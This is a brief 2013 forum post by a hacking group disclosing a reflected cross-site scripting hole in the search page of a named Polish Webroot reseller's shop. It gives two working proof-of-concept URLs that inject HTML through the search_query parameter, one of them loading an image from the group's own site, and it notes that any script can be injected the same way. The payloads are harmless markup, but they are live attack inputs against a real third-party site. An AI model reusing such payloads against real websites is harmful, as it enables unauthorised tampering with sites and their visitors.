This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
18.97.9.171.US.SSL

Webroot (polish website) - XSS

Vulnerable page: http://wrpolska.pl/sklep/search.php

PoC:

Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><h1>XSS found by Team Elite</h1>

Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and search_query parameter.

XSS
XSS


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2013-11-27 01:28 0 likes

Comments

There are no comments for this news article, you can leave one here.